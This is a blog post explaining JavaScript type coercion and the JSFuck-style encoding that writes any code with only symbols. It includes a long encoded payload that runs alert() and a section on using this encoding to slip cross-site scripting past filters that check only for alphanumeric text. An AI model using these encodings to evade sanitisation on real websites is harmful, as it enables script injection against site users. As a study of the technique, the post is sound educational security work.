XSS with JavaScript Type Coercion

By Max Fusco

Introduction

Did you know that you can express any javascript code in nothing more than the 10 characters {[(=+/>)]}. Truth is that the prior is false, you can actually express all javascript with only the 6 characters ([!+]); however that is far less efficient in terms of ratio of initial versus final characters. The former (10 characters) version is something I made myself based on the latter (6 character) framework called JSFUCK (“JSFuck”).

The following javascript is the string msf9542, my username at RIT:

(+([]+(!+[]+!+[])+[]+(!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]](+([]+(!+[]+!+[])+[]+(!+[]+!+[]+!+[])))+(![]+[])[[]+(!+[]+!+[]+!+[])]+(![]+[])[[]+(+[])]+[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])+[]+(!+[]+!+[]+!+[]+!+[]+!+[])+[]+(!+[]+!+[]+!+[]+!+[])+[]+(!+[]+!+[])

You can actually copy and paste this right now in Developer Console, try it yourself

So you are now probably thinking “why”, “why would this exist”, the answer is something that make coding in javascript more efficient and if you are a seasoned javascript developer you prob use Type Coercion all the time without realizing it’s true functionality when pushed to its limits.

What is Type Coercion

You can read more about what Type Coercion is here, as it is a common feature of many high-level programming languages like Javascript, Python, and many others (“Type coercion – MDN Web Docs Glossary: Definitions of Web-related terms | MDN”).

Say you are writing an if statement to add a numeric string with a number, most people would use the following:

let string = '9';

let number = 10;

console.log(Number(string) + number)

However, you don’t actually need to write all the code seen to get it to work. For example the following has the same functionality:

let string = '9';

let number = 10;

console.log(+string + number)

This is because at runtime JavaScript knows when you are adding the plus in front of a string that is a numeric, it will figure that you want to be a number so it converts it to a number for you.

You can do the same with the following with the output as the comment at the end:

+true // 1

+false // 0

1 && 0 // 0

1 || 0 // 1

+'' // 0

+[] // 0

!0 // true

!1 // false

Pushing it further

You can now begin to change these small type coercions into something larger.

Numbers

[]+(+[]) == '0'
[]+(+!+[]) == '1'
+[]+(+[]) == 0
+[]+(+!+[]) == 1
(+[]+(+!+[]))+(+[]+(+!+[])) == 2
(+[]+(+!+[]))+(+[]+(+!+[]))+(+[]+(+!+[])) == 3
[]+(+!+[])+[]+(+[]) =='10'
+(+(+!+[])+[]+(+[])) == 10
+(+(+!+[])+[]+(+[]))+(+[]+(+!+[])) == 11

Strings

![] == false
!![] == true
(![]+[]) == 'false'
(!![]+[]) == 'true'
(![]+[])[+[]+(+[])] == 'f'
(![]+[])[+[]+(+!+[])] == 'a'
(![]+[])[+[]+(+!+[])+(+[]+(+!+[]))] == 'l'
(![]+[])[+[]+(+!+[])+(+[]+(+!+[]))+(+[]+(+!+[]))] == 's'
(!![]+[])[+[]+(+[])] == 't'
(!![]+[])[+[]+(+!+[])] == 'r'
(!![]+[])[+[]+(+!+[])+(+[]+(+!+[]))] == 'u'
(!![]+[])[+[]+(+!+[])+(+[]+(+!+[]))+(+[]+(+!+[]))] == 'e'

More Strings

{}+[] == '[object Object]'
+!![]/+[]+[] == 'Infinity'

More More Strings

From characters ‘[object Object]’, ‘Infinity’, ‘false’, and ‘true’ we can make new strings like ‘constructor’ and soon ‘toString’

[]+([]+[])['constructor'] == 'function String() { [native code] }'
([]+(/-/)['constructor']) == 'function RegExp() { [native code] }'
(13)['toString'](14) == d
(17)['toString'](18) == h
(22)['toString'](23) == m
[]+[]["filter"]["constructor"] == 'function Function() { [native code] }'
((()=>{})['constructor']('return escape')()('\\'))[2] == 'C'

Functions

Now we have enough characters to begin running any function and get any string, we can use the form of any character by using the  “fromCharCode()” function. Running a function is also very important and you can use the following to run anything as a string.

((()=>{})['constructor']( Any Code You Want))()

Utilizing this we can now call the fromCharCode function with an integer to reproduce any functions we want from a string.

(([]+[])['constructor']['fromCharCode'](Character Integer))

How do weaponize Type Coercion

If you haven’t already figured it out, we can convert any javascript code to a string that we can send anywhere. For instance if we are just trying to make an alert box, how we could normally run “alert()” we can instead send the following to the Developer Console.

((()=>{})[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]]((![]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(+[])]+(([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]][(![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+({}+[])[[]+(+!+[])]+(+([]+(!+[]+!+[])+[]+(!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]](+([]+(!+[]+!+[])+[]+(!+[]+!+[]+!+[])))+((()=>{})[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]]((!![]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(!+[]+!+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(+!+[])]+([]+(/-/)[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])])()((/\\/+[])[[]+(+!+[])]))[[]+(!+[]+!+[])]+(+([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]]([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]))+(![]+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]+((()=>{})[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]]((!![]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(!+[]+!+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(+!+[])]+([]+(/-/)[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])])()((/\\/+[])[[]+(+!+[])]))[[]+(!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+([]+(+!+[])+[]+(!+[]+!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]](+([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])))+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]]([]+(!+[]+!+[]+!+[]+!+[])+[]+(+[])))+(([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]][(![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+({}+[])[[]+(+!+[])]+(+([]+(!+[]+!+[])+[]+(!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]](+([]+(!+[]+!+[])+[]+(!+[]+!+[]+!+[])))+((()=>{})[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]]((!![]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(!+[]+!+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(+!+[])]+([]+(/-/)[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])])()((/\\/+[])[[]+(+!+[])]))[[]+(!+[]+!+[])]+(+([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]]([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]))+(![]+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]+((()=>{})[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]]((!![]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(!+[]+!+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(+!+[])]+([]+(/-/)[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])])()((/\\/+[])[[]+(+!+[])]))[[]+(!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+([]+(+!+[])+[]+(!+[]+!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]](+([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])))+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]]([]+(!+[]+!+[]+!+[]+!+[])+[]+(+!+[])))))()

** if you cannot see the above and get an alert, it has worked 🙂

The benefit of this is that our obfuscated javascript is fully executable code but without a single alphanumeric character. This means that if a website is simply checking for alphanumeric phrases that would lead to cross site scripting in their sanitization process we can execute any code we want.

There however is a trade-off with this technique, it is expensive in terms of decoding when it is executed. From my own experience when you are encoding about 50 -100 line programs, loading the javascript into its executed form can take almost 5-10 second when the page is first loaded which is very noticeable.

To the credit of the technique, you are not able to set variables from the function because it is all loaded as a single command so whenever you are outside of the context of the running program, you are unable to see any local variables. However, you will still be able to use the Developer’s Console to view listeners loaded onto the page or similar such actions.

Similarly to the intensive computation needed to execute longer programs, without understanding how the encoding process works makes it almost impossible to simply decode because of the custom encoding scheme. However, if you know what you are doing you remove the execution wrapper seen in the “Function” subsection and replace it with console.log() and you will be greeted with all of the code that is being executed.

Similar Attacks

Back when the JSFUCK technique was first invented companies were attacked using it. One of the most prolific of these hacks was ebay.com (Kovacs). Back in 2016, the attack allowed for store cross-site scripting on ebay pages themselves, this meant that something as simple as loading a malicious entry or viewing a compromised comment could result in cross-site scripting.

Mentioning that amount of commerce that is done on ebay.com, it was not quickly found out serious amounts of money could have been at stake. Luckily for ebay.com and its users it was not quickly patched and the company moved on from the incident.

Today JSFUCK is no more than a CTF challenge or an exploit on sites with developer that have never dealt with proper coding practice before or try and implement their own sanitization protocol instead of using a well known and working one.

Citations

Works Cited

“JSFuck.” Wikipedia, https://en.wikipedia.org/wiki/JSFuck. Accessed 11 April 2022.

Kovacs, Eduard. “eBay Flaw Exposes Users to Malware, Phishing Attacks.” SecurityWeek, 3 February 2016, https://www.securityweek.com/ebay-flaw-exposes-users-malware-phishing-attacks. Accessed 11 April 2022.

“Type coercion – MDN Web Docs Glossary: Definitions of Web-related terms | MDN.” MDN Web Docs, 7 October 2021, https://developer.mozilla.org/en-US/docs/Glossary/Type_coercion. Accessed 11 April 2022.

Advertisement

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s